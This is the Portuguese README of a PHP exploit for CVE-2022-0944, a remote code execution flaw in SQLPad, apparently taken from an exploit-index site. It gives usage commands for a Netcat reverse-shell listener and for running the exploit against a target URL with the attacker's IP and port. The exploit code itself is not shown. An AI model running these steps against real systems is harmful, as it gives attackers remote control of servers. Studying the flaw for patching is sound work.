## https://sploitus.com/exploit?id=AE215765-D26B-5FF6-9745-47C49E258FD0
# SQLPad-RCE-Exploit-CVE-2022-0944
CVE-2022-0944 Remote Code Execution Exploit
# Funcionamento:
Este código PHP é projetado para explorar uma vulnerabilidade de Execução Remota de Código (RCE) no software SQLPad, relacionada à falha CVE-2022-0944. Ele funciona injetando um código malicioso na aplicação SQLPad, forçando-a a executar um comando de sistema que abre uma shell reversa – uma conexão que dá ao atacante controle remoto do sistema vulnerável.
# Pré-requisitos:
PHP CLI - (sudo apt-get install php-cli)
cURL (biblioteca PHP cURL) - (sudo apt-get install php-curl)
# Modo de uso:
configuração do Listener no Atacante
Para capturar a conexão reversa, inicie o Netcat na máquina do atacante. (nc -lvnp 4444)
php exploit.php <root_url> <attacker_ip> <attacker_port>
<root_url>: A URL raiz do SQLPad vulnerável (ex.: http://target.com:3000).
<attacker_ip>: O endereço IP do atacante que escuta a conexão reversa (mesmo IP do Netcat).
<attacker_port>: A porta na qual o atacante está escutando (mesma porta usada no Netcat).
# Referencias:
A logica original do exploit foi baseada neste repositorio:
https://github.com/0xRoqeeb/sqlpad-rce-exploit-CVE-2022-0944.git
Minha ideia aqui, foi entender a logica e reescrever em outra linguagem me desafiando a conseguir.
https://nvd.nist.gov/vuln/detail/CVE-2022-0944